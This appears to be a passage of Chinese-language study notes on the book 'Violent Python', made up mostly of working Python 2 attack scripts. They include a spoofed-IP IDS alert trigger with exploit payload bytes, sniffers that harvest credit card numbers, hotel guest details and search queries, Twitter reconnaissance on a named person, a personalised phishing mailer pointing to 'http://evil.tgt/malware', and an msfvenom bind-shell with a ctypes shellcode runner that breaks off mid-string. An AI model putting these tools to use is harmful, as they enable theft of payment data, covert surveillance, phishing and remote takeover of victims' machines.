send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / ICMP(type=0) / Raw(load='AAAAAAAAAA')
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / UDP(dport=31335) / Raw(load='PONG')
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / ICMP(type=0, id=456)
send(pkt, iface=iface, count=count)
# 触发exploits警报
def exploitTest(src, dst, iface, count):
pkt = IP(src=src, dst=dst) / UDP(dport=518) / Raw(load="\x01\x03\x00\x00\x00\x00\x00\x01\x00\x02\x02\xE8")
send(pkt, iface=iface, count=count)
pkt = IP(src=src, dst=dst) / UDP(dport=635) / Raw(load="^\xB0\x02\x89\x06\xFE\xC8\x89F\x04\xB0\x06\x89F")
send(pkt, iface=iface, count=count)
# 触发踩点扫描警报
def scanTest(src, dst, iface, count):
pkt = IP(src=src, dst=dst) / UDP(dport=7) / Raw(load='cybercop')
send(pkt)
pkt = IP(src=src, dst=dst) / UDP(dport=10080) / Raw(load='Amanda')
send(pkt, iface=iface, count=count)
def main():
parser = optparse.OptionParser('[*]Usage: python idsFoil.py -i -s -t -c ')
parser.add_option('-i', dest='iface', type='string', help='specify network interface')
parser.add_option('-s', dest='src', type='string', help='specify source address')
parser.add_option('-t', dest='tgt', type='string', help='specify target address')
parser.add_option('-c', dest='count', type='int', help='specify packet count')
(options, args) = parser.parse_args()
if options.iface == None:
iface = 'eth0'
else:
iface = options.iface
if options.src == None:
src = '.'.join([str(randint(1,254)) for x in range(4)])
else:
src = options.src
if options.tgt == None:
print parser.usage
exit(0)
else:
dst = options.tgt
if options.count == None:
count = 1
else:
count = options.count
ddosTest(src, dst, iface, count)
exploitTest(src, dst, iface, count)
scanTest(src, dst, iface, count)
if __name__ == '__main__':
main()
运行结果:
可以看到,一共发送了8个数据包。
切换到目标主机的snort进行警报信息查看,可以看到,触发了8条警报,且源地址显示的是伪造的IP:
本章大部分代码都是实现了但是缺乏相应的应用环境,想具体测试的可以直接找到对应的环境或者自行修改脚本以适应生活常用的环境。
插入无线网卡,输入iwconfig命令查看网卡信息:
将可能会影响进行无线实验的因素排除掉,然后将网卡设置为混杂模式:
确认进入Monitor模式:
测试嗅探无线网络的代码:
#!/usr/bin/python
#coding=utf-8
from scapy.all import *
def pktPrint(pkt):
if pkt.haslayer(Dot11Beacon):
print '[+] Detected 802.11 Beacon Frame'
elif pkt.haslayer(Dot11ProbeReq):
print '[+] Detected 802.11 Probe Request Frame'
elif pkt.haslayer(TCP):
print '[+] Detected a TCP Packet'
elif pkt.haslayer(DNS):
print '[+] Detected a DNS Packet'
conf.iface = 'wlan0mon'
sniff(prn=pktPrint)
运行结果:
apt-get update
apt-get install python-bluez bluetooth python-boexftp
另外还需要一个蓝牙设备,测试能否识别该设备:hciconfig
由于本人没有蓝牙设备,蓝牙部分就先不进行测试。
这里主要搜找书上所列的3种常用的信用卡:Visa、MasterCard和American Express。
测试代码:
#!/usr/bin/python
#coding=utf-8
import re
def findCreditCard(raw):
# American Express信用卡由34或37开头的15位数字组成
americaRE = re.findall('3[47][0-9]{13}', raw)
if americaRE:
print '[+] Found American Express Card: ' + americaRE[0]
def main():
tests = []
tests.append('I would like to buy 1337 copies of that dvd')
tests.append('Bill my card: 378282246310005 for \$2600')
for test in tests:
findCreditCard(test)
if __name__ == '__main__':
main()
运行结果:
接着就加入Scapy来嗅探TCP数据包实现嗅探功能:
#!/usr/bin/python
#coding=utf-8
import re
import optparse
from scapy.all import *
def findCreditCard(pkt):
raw = pkt.sprintf('%Raw.load%')
# American Express信用卡由34或37开头的15位数字组成
americaRE = re.findall('3[47][0-9]{13}', raw)
# MasterCard信用卡的开头为51~55,共16位数字
masterRE = re.findall('5[1-5][0-9]{14}', raw)
# Visa信用卡开头数字为4,长度为13或16位
visaRE = re.findall('4[0-9]{12}(?:[0-9]{3})?', raw)
if americaRE:
print '[+] Found American Express Card: ' + americaRE[0]
if masterRE:
print '[+] Found MasterCard Card: ' + masterRE[0]
if visaRE:
print '[+] Found Visa Card: ' + visaRE[0]
def main():
parser = optparse.OptionParser('[*]Usage: python creditSniff.py -i ')
parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
(options, args) = parser.parse_args()
if options.interface == None:
print parser.usage
exit(0)
else:
conf.iface = options.interface
try:
print '[*] Starting Credit Card Sniffer.'
sniff(filter='tcp', prn=findCreditCard, store=0)
except KeyboardInterrupt:
exit(0)
if __name__ == '__main__':
main()
运行结果:
当然并没有这几种信用卡,而且在本地不常见。具体其他信用卡号的规律可以自己发掘一下。
这段脚本所在的网络环境是作者所在宾馆的环境,不同环境肯定有区别,可以自行抓包修改脚本实现嗅探。
#!/usr/bin/python
#coding=utf-8
import optparse
from scapy.all import *
def findGuest(pkt):
raw = pkt.sprintf('%Raw.load%')
name = re.findall('(?i)LAST_NAME=(.*)&', raw)
room = re.findall("(?i)ROOM_NUMBER=(.*)'", raw)
if name:
print '[+] Found Hotel Guest ' + str(name[0]) + ', Room #' + str(room[0])
def main():
parser = optparse.OptionParser('[*]Usage: python hotelSniff.py -i ')
parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
(options, args) = parser.parse_args()
if options.interface == None:
print parser.usage
exit(0)
else:
conf.iface = options.interface
try:
print '[*] Starting Hotel Guest Sniffer.'
sniff(filter='tcp', prn=findGuest, store=0)
except KeyboardInterrupt:
exit(0)
if __name__ == '__main__':
main()
当然没有嗅探出信息:
Google搜索,由“q=”开始,中间是要搜索的字符串,并以“&”终止,字符“pg=”后接的是上一个搜索的内容。
#!/usr/bin/python
#coding=utf-8
import optparse
from scapy.all import *
def findGoogle(pkt):
if pkt.haslayer(Raw):
payload = pkt.getlayer(Raw).load
if 'GET' in payload:
if 'google' in payload:
r = re.findall(r'(?i)\&q=(.*?)\&', payload)
if r:
search = r[0].split('&')[0]
search = search.replace('q=', '').replace('+', ' ').replace('%20', ' ')
print '[+] Searched For: ' + search
def main():
parser = optparse.OptionParser('[*]Usage: python googleSniff.py -i ')
parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
(options, args) = parser.parse_args()
if options.interface == None:
print parser.usage
exit(0)
else:
conf.iface = options.interface
try:
print '[*] Starting Google Sniffer.'
sniff(filter='tcp port 80', prn=findGoogle)
except KeyboardInterrupt:
exit(0)
if __name__ == '__main__':
main()
嗅探不到什么结果的就不给出截图了,后面部分也一样。
#!/usr/bin/python
#coding=utf-8
import optparse
from scapy.all import *
def findGuest(pkt):
raw = pkt.sprintf('%Raw.load%')
name = re.findall('(?i)LAST_NAME=(.*)&', raw)
room = re.findall("(?i)ROOM_NUMBER=(.*)'", raw)
if name:
print '[+] Found Hotel Guest ' + str(name[0]) + ', Room #' + str(room[0])
def main():
parser = optparse.OptionParser('[*]Usage: python hotelSniff.py -i ')
parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
(options, args) = parser.parse_args()
if options.interface == None:
print parser.usage
exit(0)
else:
conf.iface = options.interface
try:
print '[*] Starting Hotel Guest Sniffer.'
sniff(filter='tcp', prn=findGuest, store=0)
except KeyboardInterrupt:
exit(0)
if __name__ == '__main__':
main()
#!/usr/bin/python
#utf-8
from scapy.all import *
interface = 'wlan0mon'
probeReqs = []
def sniffProbe(p):
if p.haslayer(Dot11ProbeReq):
netName = p.getlayer(Dot11ProbeReq).info
if netName not in probeReqs:
probeReqs.append(netName)
print '[+] Detected New Probe Request: ' + netName
sniff(iface=interface, prn=sniffProbe)
def sniffDot11(p):
if p.haslayer(Dot11Beacon):
if p.getlayer(Dot11Beacon).info == '':
addr2 = p.getlayer(Dot11).addr2
if addr2 not in hiddenNets:
print '[-] Detected Hidden SSID: with MAC:' + addr2
hiddenNets.append(addr2)
#!/usr/bin/python
#coding=utf-8
import sys
from scapy import *
interface = 'wlan0mon'
hiddenNets = []
unhiddenNets = []
def sniffDot11(p):
if p.haslayer(Dot11ProbeResp):
addr2 = p.getlayer(Dot11).addr2
if (addr2 in hiddenNets) & (addr2 not in unhiddenNets):
netName = p.getlayer(Dot11ProbeResp).info
print '[+] Decloaked Hidden SSID : ' + netName + ' for MAC: ' + addr2
unhiddenNets.append(addr2)
if p.haslayer(Dot11Beacon):
if p.getlayer(Dot11Beacon).info == '':
addr2 = p.getlayer(Dot11).addr2
if addr2 not in hiddenNets:
print '[-] Detected Hidden SSID: with MAC:' + addr2
hiddenNets.append(addr2)
sniff(iface=interface, prn=sniffDot11)
本章后面的代码实用性不高,暂时也不贴该块的代码了,也没有测试的环境。
Mechanize库的Browser类允许我们对浏览器中的任何内容进行操作。
#!/usr/bin/python
#coding=utf-8
import mechanize
def viewPage(url):
browser = mechanize.Browser()
page = browser.open(url)
source_code = page.read()
print source_code
viewPage('http://www.imooc.com/')
运行结果:
书上是从http://www.hidemyass.com/中获取的一个代理IP,且在http://ip.ntfsc.noaa.gov/中显示的当前IP来测试代理IP是否可用。但是以上两个网址正常都访问不了,那就直接用国内访问得了的吧,具体的可参考《Python爬虫之基础篇》中的代理IP部分。
为了方便,直接上之前的脚本找找看哪些代理IP可用,有个注意的地方就是查看当前IP的网址变为http://2017.ip138.com/ic.asp,之前的那个现在是查看CDN节点IP的了。
agentIP.py的运行结果:
直接找显示可行的那个代理IP下来,编写使用Mechanize验证代理IP的脚本:
#!/usr/bin/python
#coding=utf-8
import mechanize
def testProxy(url, proxy):
browser = mechanize.Browser()
browser.set_proxies(proxy)
page = browser.open(url)
source_code = page.read()
print source_code
url = 'http://2017.ip138.com/ic.asp'
hideMeProxy = {'http': '139.196.202.164:9001'}
testProxy(url, hideMeProxy)
运行结果:
可用看到,页面显示的IP地址确实是代理的IP地址。
另外还要添加User-Agent的匿名,在http://www.useragentstring.com/pages/useragentstring.php中有很多版本的UA提供。另外,该页面http://whatismyuseragent.dotdoh.com提供将UA显示在页面的功能,但现在已经用不了了。还是写上书上的源代码:
#!/usr/bin/python
#coding=utf-8
import mechanize
def testUserAgent(url, userAgent):
browser = mechanize.Browser()
browser.addheaders = userAgent
page = browser.open(url)
source_code = page.read()
print source_code
url = 'http://whatismyuseragent.dotdoh.com/'
userAgent = [('User-agent', 'Mozilla/5.0 (X11; U; Linux 2.4.2-2 i586; en-US; m18) Gecko/20010131 Netscape6/6.01')]
testUserAgent(url, userAgent)
下面是个人修改的部分,同样以页面返回的形式来验证UA:
先换个国内查看UA的网页吧:http://www.atool.org/useragent.php
刚打开时会出现如图等待的页面,过了5秒后才真正地跳转到返回UA的页面:
这个主要是防止一些静态爬虫以及拦截一些非浏览器特征的请求,这时Mechanize库就不能起作用了,这时就简单地编写动态爬虫绕过这个机制吧。
查看下源代码中的标签内容:
根据这个标签的特征,编写验证UA的动态爬虫,这里设置webdriver驱动UA有两种方式:
#!/usr/bin/python
#coding=utf-8
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from bs4 import BeautifulSoup as BS
import time
url = 'http://www.atool.org/useragent.php'
# 设置PhantomJS的请求头
# dcap = dict(DesiredCapabilities.PHANTOMJS)
# dcap["phantomjs.page.settings.userAgent"] = ("Hello World! BY PhantomJS")
# driver = webdriver.PhantomJS(executable_path='E:\Python27\Scripts\phantomjs-2.1.1-windows\\bin\phantomjs.exe', desired_capabilities=dcap)
# 设置Chrome的请求头
options = webdriver.ChromeOptions()
options.add_argument('--user-agent=Hello World! BY Chrome')
driver = webdriver.Chrome(chrome_options=options)
driver.get(url)
time.sleep(5)
page_source = driver.page_source
soup = BS(page_source, 'lxml')
ua = soup.find_all(name='input', attrs={'id':'ua_code'})[0].get('value')
print "[*] Your User-Agent is: " + ua
看看Chrome驱动返回的数据:
接着和Cookielib库一起使用,使用一个能把各个不同的cookie保存到磁盘中的容器,该功能允许用户收到cookie后不必把它返回给网站,且可以查看其中的内容:
#!/usr/bin/python
#coding=utf-8
import mechanize
import cookielib
def printCookies(url):
browser = mechanize.Browser()
cookie_jar = cookielib.LWPCookieJar()
browser.set_cookiejar(cookie_jar)
page = browser.open(url)
for cookie in cookie_jar:
print cookie
url = 'http://www.imooc.com/'
printCookies(url)
运行结果:
现在把前面代码中的几个匿名操作的函数集成在一个新类anonBrowser中,该类继承了Mechanize库的Browser类并直接封装前面所有的函数,同时添加了__init__()函数、其中的参数使用户可以自定义添加代理列表和UA列表。
#!/usr/bin/python
#coding=utf-8
import mechanize
import cookielib
import random
class anonBrowser(mechanize.Browser):
def __init__(self, proxies = [], user_agents = []):
mechanize.Browser.__init__(self)
self.set_handle_robots(False)
# 可供用户使用的代理服务器列表
self.proxies = proxies
# user_agent列表
self.user_agents = user_agents + ['Mozilla/4.0 ', 'FireFox/6.01','ExactSearch', 'Nokia7110/1.0']
self.cookie_jar = cookielib.LWPCookieJar()
self.set_cookiejar(self.cookie_jar)
self.anonymize()
# 清空cookie
def clear_cookies(self):
self.cookie_jar = cookielib.LWPCookieJar()
self.set_cookiejar(self.cookie_jar)
# 从user_agent列表中随机设置一个user_agent
def change_user_agent(self):
index = random.randrange(0, len(self.user_agents) )
self.addheaders = [('User-agent', ( self.user_agents[index] ))]
# 从代理列表中随机设置一个代理
def change_proxy(self):
if self.proxies:
index = random.randrange(0, len(self.proxies))
self.set_proxies( {'http': self.proxies[index]} )
# 调用上述三个函数改变UA、代理以及清空cookie以提高匿名性,其中sleep参数可让进程休眠以进一步提高匿名效果
def anonymize(self, sleep = False):
self.clear_cookies()
self.change_user_agent()
self.change_proxy()
if sleep:
time.sleep(60)
测试每次是否使用不同的cookie访问:
#!/usr/bin/python
#coding=utf-8
from anonBrowser import *
ab = anonBrowser(proxies=[], user_agents=[('User-agent','superSecretBroswer')])
for attempt in range(1, 5):
# 每次访问都进行一次匿名操作
ab.anonymize()
print '[*] Fetching page'
response = ab.open('http://www.kittenwar.com/')
for cookie in ab.cookie_jar:
print cookie
访问http://www.kittenwar.com/,可以看到每次都使用不同的cookie:
下面的脚本主要比较使用re模块和BeautifulSoup模块爬取页面数据的区别。
#!/usr/bin/python
#coding=utf-8
from anonBrowser import *
from BeautifulSoup import BeautifulSoup
import os
import optparse
import re
def printLinks(url):
ab = anonBrowser()
ab.anonymize()
page = ab.open(url)
html = page.read()
# 使用re模块解析href链接
try:
print '[+] Printing Links From Regex.'
link_finder = re.compile('href="(.*?)"')
links = link_finder.findall(html)
for link in links:
print link
except:
pass
# 使用bs4模块解析href链接
try:
print '\n[+] Printing Links From BeautifulSoup.'
soup = BeautifulSoup(html)
links = soup.findAll(name='a')
for link in links:
if link.has_key('href'):
print link['href']
except:
pass
def main():
parser = optparse.OptionParser('[*]Usage: python linkParser.py -u ')
parser.add_option('-u', dest='tgtURL', type='string', help='specify target url')
(options, args) = parser.parse_args()
url = options.tgtURL
if url == None:
print parser.usage
exit(0)
else:
printLinks(url)
if __name__ == '__main__':
main()
运行结果:
可以看到,re模块解析的结果是含有styles.css链接,而BeautifulSoup模块却会自己识别并忽略掉。
主要用BS寻找img标签,然后使用browser对象下载图片并以二进制的形式保存到本地目录中。
#!/usr/bin/python
#coding=utf-8
from anonBrowser import *
from BeautifulSoup import BeautifulSoup
import os
import optparse
def mirrorImages(url, dir):
ab = anonBrowser()
ab.anonymize()
html = ab.open(url)
soup = BeautifulSoup(html)
image_tags = soup.findAll('img')
for image in image_tags:
# lstrip() 方法用于截掉字符串左边的空格或指定字符
filename = image['src'].lstrip('http://')
filename = os.path.join(dir, filename.replace('/', '_'))
print '[+] Saving ' + str(filename)
data = ab.open(image['src']).read()
# 回退
ab.back()
save = open(filename, 'wb')
save.write(data)
save.close()
def main():
parser = optparse.OptionParser('[*]Usage: python imageMirror.py -u -d ')
parser.add_option('-u', dest='tgtURL', type='string', help='specify target url')
parser.add_option('-d', dest='dir', type='string', help='specify destination directory')
(options, args) = parser.parse_args()
url = options.tgtURL
dir = options.dir
if url == None or dir == None:
print parser.usage
exit(0)
else:
try:
mirrorImages(url, dir)
except Exception, e:
print '[-] Error Mirroring Images.'
print '[-] ' + str(e)
if __name__ == '__main__':
main()
运行结果:
调用urllib库的quote_plus()函数进行URL编码,可以使查询内容的字符串中需要进行编码的内容进行相应的编码(如空格编码为+)。
书上的接口(http://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=)已经过期了:
提示换新的接口Custom Search API,具体怎么使用可以网上搜一下,这里直接上API:
https://www.googleapis.com/customsearch/v1?key=你的key&cx=你的id&num=1&alt=json&q=
num表示返回结果的数量、这里因为只是测试就设置为1,alt指定返回的数据格式、这里为Json,q后面为查询的内容、其内容需要经过URL编码。
#!/usr/bin/python
#coding=utf-8
import urllib
from anonBrowser import *
def google(search_term):
ab = anonBrowser()
# URL编码
search_term = urllib.quote_plus(search_term)
response = ab.open('https://www.googleapis.com/customsearch/v1?key=你的key&cx=你的id&num=1&alt=json&q=' + search_term)
print response.read()
google('Boundock Saint')
运行结果:
可以看到返回的是Json格式的数据。
接着就对Json格式的数据进行处理:
添加json库的load()函数对Json数据进行加载即可:
#!/usr/bin/python
#coding=utf-8
import urllib
from anonBrowser import *
import json
def google(search_term):
ab = anonBrowser()
# URL编码
search_term = urllib.quote_plus(search_term)
response = ab.open('https://www.googleapis.com/customsearch/v1?key=你的key&cx=你的id&num=1&alt=json&q=' + search_term)
objects = json.load(response)
print objects
google('Boundock Saint')
运行结果:
因为API不同,返回的Json数据的结构也略为不同,需要重新解析:
编写Google_Result类,用于保存Json数据解析下来的标题、页面链接以及一小段的简介:
#!/usr/bin/python
#coding=utf-8
import urllib
from anonBrowser import *
import json
import optparse
class Google_Result:
def __init__(self,title,text,url):
self.title = title
self.text = text
self.url = url
def __repr__(self):
return self.title
def google(search_term):
ab = anonBrowser()
# URL编码
search_term = urllib.quote_plus(search_term)
response = ab.open('https://www.googleapis.com/customsearch/v1?key=你的key&cx=你的id&num=1&alt=json&q=' + search_term)
objects = json.load(response)
results = []
for result in objects['items']:
url = result['link']
title = result['title']
text = result['snippet']
print url
print title
print text
new_gr = Google_Result(title, text, url)
results.append(new_gr)
return results
def main():
parser = optparse.OptionParser('[*]Usage: python anonGoogle.py -k ')
parser.add_option('-k', dest='keyword', type='string', help='specify google keyword')
(options, args) = parser.parse_args()
keyword = options.keyword
if options.keyword == None:
print parser.usage
exit(0)
else:
results = google(keyword)
print results
if __name__ == '__main__':
main()
运行结果:
和Google一样,Twitter也给开发者提供了API,相关文档在http://dev.twitter.com/docs。当然,这部分是需要FQ的,而且API地址也换了,对于返回Json格式的数据需要如Google Custom Search API一样进行另外分析,方法大同小异,可以自行测试一下,这里就只列出书上的代码,后面涉及Twitter的小节也一样。
#!/usr/bin/python
#coding=utf-8
import json
import urllib
from anonBrowser import *
class reconPerson:
def __init__(self, first_name, last_name, job='', social_media={}):
self.first_name = first_name
self.last_name = last_name
self.job = job
self.social_media = social_media
def __repr__(self):
return self.first_name + ' ' + self.last_name + ' has job ' + self.job
def get_social(self, media_name):
if self.social_media.has_key(media_name):
return self.social_media[media_name]
return None
def query_twitter(self, query):
query = urllib.quote_plus(query)
results = []
browser = anonBrowser()
response = browser.open('http://search.twitter.com/search.json?q=' + query)
json_objects = json.load(response)
for result in json_objects['results']:
new_result = {}
new_result['from_user'] = result['from_user_name']
new_result['geo'] = result['geo']
new_result['tweet'] = result['text']
results.append(new_result)
return results
ap = reconPerson('Boondock', 'Saint')
print ap.query_twitter('from:th3j35t3r since:2010-01-01 include:retweets')
#!/usr/bin/python
#coding=utf-8
import json
import urllib
import optparse
from anonBrowser import *
def get_tweets(handle):
query = urllib.quote_plus('from:' + handle + ' since:2009-01-01 include:retweets')
tweets = []
browser = anonBrowser()
browser.anonymize()
response = browser.open('http://search.twitter.com/search.json?q='+ query)
json_objects = json.load(response)
for result in json_objects['results']:
new_result = {}
new_result['from_user'] = result['from_user_name']
new_result['geo'] = result['geo']
new_result['tweet'] = result['text']
tweets.append(new_result)
return tweets
def load_cities(cityFile):
cities = []
for line in open(cityFile).readlines():
city=line.strip('\n').strip('\r').lower()
cities.append(city)
return cities
def twitter_locate(tweets,cities):
locations = []
locCnt = 0
cityCnt = 0
tweetsText = ""
for tweet in tweets:
if tweet['geo'] != None:
locations.append(tweet['geo'])
locCnt += 1
tweetsText += tweet['tweet'].lower()
for city in cities:
if city in tweetsText:
locations.append(city)
cityCnt+=1
print "[+] Found " + str(locCnt) + " locations via Twitter API and " + str(cityCnt) + " locations from text search."
return locations
def main():
parser = optparse.OptionParser('[*]Usage: python twitterGeo.py -u [-c ]')
parser.add_option('-u', dest='handle', type='string', help='specify twitter handle')
parser.add_option('-c', dest='cityFile', type='string', help='specify file containing cities to search')
(options, args) = parser.parse_args()
handle = options.handle
cityFile = options.cityFile
if (handle==None):
print parser.usage
exit(0)
cities = []
if (cityFile!=None):
cities = load_cities(cityFile)
tweets = get_tweets(handle)
locations = twitter_locate(tweets,cities)
print "[+] Locations: "+str(locations)
if __name__ == '__main__':
main()
#!/usr/bin/python
#coding=utf-8
import json
import re
import urllib
import urllib2
import optparse
from anonBrowser import *
def get_tweets(handle):
query = urllib.quote_plus('from:' + handle + ' since:2009-01-01 include:retweets')
tweets = []
browser = anonBrowser()
browser.anonymize()
response = browser.open('http://search.twitter.com/search.json?q='+ query)
json_objects = json.load(response)
for result in json_objects['results']:
new_result = {}
new_result['from_user'] = result['from_user_name']
new_result['geo'] = result['geo']
new_result['tweet'] = result['text']
tweets.append(new_result)
return tweets
def find_interests(tweets):
interests = {}
interests['links'] = []
interests['users'] = []
interests['hashtags'] = []
for tweet in tweets:
text = tweet['tweet']
links = re.compile('(http.*?)\Z|(http.*?) ').findall(text)
for link in links:
if link[0]:
link = link[0]
elif link[1]:
link = link[1]
else:
continue
try:
response = urllib2.urlopen(link)
full_link = response.url
interests['links'].append(full_link)
except:
pass
interests['users'] += re.compile('(@\w+)').findall(text)
interests['hashtags'] += re.compile('(#\w+)').findall(text)
interests['users'].sort()
interests['hashtags'].sort()
interests['links'].sort()
return interests
def main():
parser = optparse.OptionParser('[*]Usage: python twitterInterests.py -u ')
parser.add_option('-u', dest='handle', type='string', help='specify twitter handle')
(options, args) = parser.parse_args()
handle = options.handle
if handle == None:
print parser.usage
exit(0)
tweets = get_tweets(handle)
interests = find_interests(tweets)
print '\n[+] Links.'
for link in set(interests['links']):
print ' [+] ' + str(link)
print '\n[+] Users.'
for user in set(interests['users']):
print ' [+] ' + str(user)
print '\n[+] HashTags.'
for hashtag in set(interests['hashtags']):
print ' [+] ' + str(hashtag)
if __name__ == '__main__':
main()
编写reconPerson类,封装所有抓取的地理位置、兴趣爱好以及Twitter页面的代码:
#!/usr/bin/python
#coding=utf-8
import urllib
from anonBrowser import *
import json
import re
import urllib2
class reconPerson:
def __init__(self, handle):
self.handle = handle
self.tweets = self.get_tweets()
def get_tweets(self):
query = urllib.quote_plus('from:' + self.handle + ' since:2009-01-01 include:retweets')
tweets = []
browser = anonBrowser()
browser.anonymize()
response = browser.open('http://search.twitter.com/search.json?q=' + query)
json_objects = json.load(response)
for result in json_objects['results']:
new_result = {}
new_result['from_user'] = result['from_user_name']
new_result['geo'] = result['geo']
new_result['tweet'] = result['text']
tweets.append(new_result)
return tweets
def find_interests(self):
interests = {}
interests['links'] = []
interests['users'] = []
interests['hashtags'] = []
for tweet in self.tweets:
text = tweet['tweet']
links = re.compile('(http.*?)\Z|(http.*?) ').findall(text)
for link in links:
if link[0]:
link = link[0]
elif link[1]:
link = link[1]
else:
continue
try:
response = urllib2.urlopen(link)
full_link = response.url
interests['links'].append(full_link)
except:
pass
interests['users'] += re.compile('(@\w+)').findall(text)
interests['hashtags'] += re.compile('(#\w+)').findall(text)
interests['users'].sort()
interests['hashtags'].sort()
interests['links'].sort()
return interests
def twitter_locate(self, cityFile):
cities = []
if cityFile != None:
for line in open(cityFile).readlines():
city = line.strip('\n').strip('\r').lower()
cities.append(city)
locations = []
locCnt = 0
cityCnt = 0
tweetsText = ''
for tweet in self.tweets:
if tweet['geo'] != None:
locations.append(tweet['geo'])
locCnt += 1
tweetsText += tweet['tweet'].lower()
for city in cities:
if city in tweetsText:
locations.append(city)
cityCnt += 1
return locations
一次性电子邮箱提高匿名性,可以使用十分钟邮箱:
https://10minutemail.com/10MinuteMail/index.html
这里用Python编写客户端的电子邮件并发送给目标主机,调用smtplib库来使用谷歌的Gmail SMTP服务器,进行登录、发送邮件等操作。
当然,gmail的安全措施做得很好,在用Python登录Gmail账号之前要保证你在Gmail中设置了允许不安全登录的选项。
#!/usr/bin/python
#coding=utf-8
import smtplib
from email.mime.text import MIMEText
def sendMail(user, pwd, to, subject, text):
msg = MIMEText(text)
msg['From'] = user
msg['To'] = to
msg['Subject'] = subject
try:
smtpServer = smtplib.SMTP('smtp.gmail.com', 587)
print "[+] Connecting To Mail Server."
smtpServer.ehlo()
print "[+] Starting Encrypted Session."
smtpServer.starttls()
smtpServer.ehlo()
print "[+] Logging Into Mail Server."
smtpServer.login(user, pwd)
print "[+] Sending Mail."
smtpServer.sendmail(user, to, msg.as_string())
smtpServer.close()
print "[+] Mail Sent Successfully."
except:
print "[-] Sending Mail Failed."
user = 'username'
pwd = 'password'
sendMail(user, pwd, '[email protected]', 'Re: Important', 'Test Message')
运行结果:
由Gmail邮箱发往自己的QQ邮箱,到QQ邮箱查看:
这里主要是结合前面twitterClass.py文件来利用目标对象留在Twitter上可以公开访问的信息进行攻击的,会找到目标的地理位置、@过的用户、hash标签以及链接,然后生成和发送一个含有恶意链接的电子邮件,等待目标对象去点击。自行修改了Twitter类解析的规则之后可以测试一下。
#!/usr/bin/python
#coding=utf-8
import smtplib
import optparse
from email.mime.text import MIMEText
from twitterClass import *
from random import choice
def sendMail(user, pwd, to, subject, text):
msg = MIMEText(text)
msg['From'] = user
msg['To'] = to
msg['Subject'] = subject
try:
smtpServer = smtplib.SMTP('smtp.gmail.com', 587)
print "[+] Connecting To Mail Server."
smtpServer.ehlo()
print "[+] Starting Encrypted Session."
smtpServer.starttls()
smtpServer.ehlo()
print "[+] Logging Into Mail Server."
smtpServer.login(user, pwd)
print "[+] Sending Mail."
smtpServer.sendmail(user, to, msg.as_string())
smtpServer.close()
print "[+] Mail Sent Successfully."
except:
print "[-] Sending Mail Failed."
def main():
parser = optparse.OptionParser('[*]Usage: python sendSam.py -u -t ' + '-l -p ')
parser.add_option('-u', dest='handle', type='string', help='specify twitter handle')
parser.add_option('-t', dest='tgt', type='string', help='specify target email')
parser.add_option('-l', dest='user', type='string', help='specify gmail login')
parser.add_option('-p', dest='pwd', type='string', help='specify gmail password')
(options, args) = parser.parse_args()
handle = options.handle
tgt = options.tgt
user = options.user
pwd = options.pwd
if handle == None or tgt == None or user ==None or pwd==None:
print parser.usage
exit(0)
print "[+] Fetching tweets from: " + str(handle)
spamTgt = reconPerson(handle)
spamTgt.get_tweets()
print "[+] Fetching interests from: " + str(handle)
interests = spamTgt.find_interests()
print "[+] Fetching location information from: " + str(handle)
location = spamTgt.twitter_locate('mlb-cities.txt')
spamMsg = "Dear " + tgt + ","
if (location != None):
randLoc = choice(location)
spamMsg += " Its me from " + randLoc + "."
if (interests['users'] != None):
randUser = choice(interests['users'])
spamMsg += " " + randUser + " said to say hello."
if (interests['hashtags'] != None):
randHash=choice(interests['hashtags'])
spamMsg += " Did you see all the fuss about " + randHash + "?"
if (interests['links']!=None):
randLink=choice(interests['links'])
spamMsg += " I really liked your link to: " + randLink + "."
spamMsg += " Check out my link to http://evil.tgt/malware"
print "[+] Sending Msg: " + spamMsg
sendMail(user, pwd, tgt, 'Re: Important', spamMsg)
if __name__ == '__main__':
main()
使用Metasploit生成C语言风格的一些shellcode作为载荷,这里使用Windows bindshell,功能为选定一个TCP端口与cmd.exe进程绑定在一起,方便攻击者远程连接进行操控。
输入命令:
msfvenom -p windows/shell_bind_tcp LPORT=1337 -f c -o payload.c
具体参数的解释看《关于Metasploit的学习笔记(二)》即可。
查看该c文件:
接着在Python中调用ctypes库,定义一个存在该shellcode的变量,把变量看作是一个C语言的函数,执行它即可。
#!/usr/bin/python
#coding=utf-8
from ctypes import *
shellcode = ("\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40"
"\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x05\x39\x89"
"\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7"
"\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97"
"\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57"
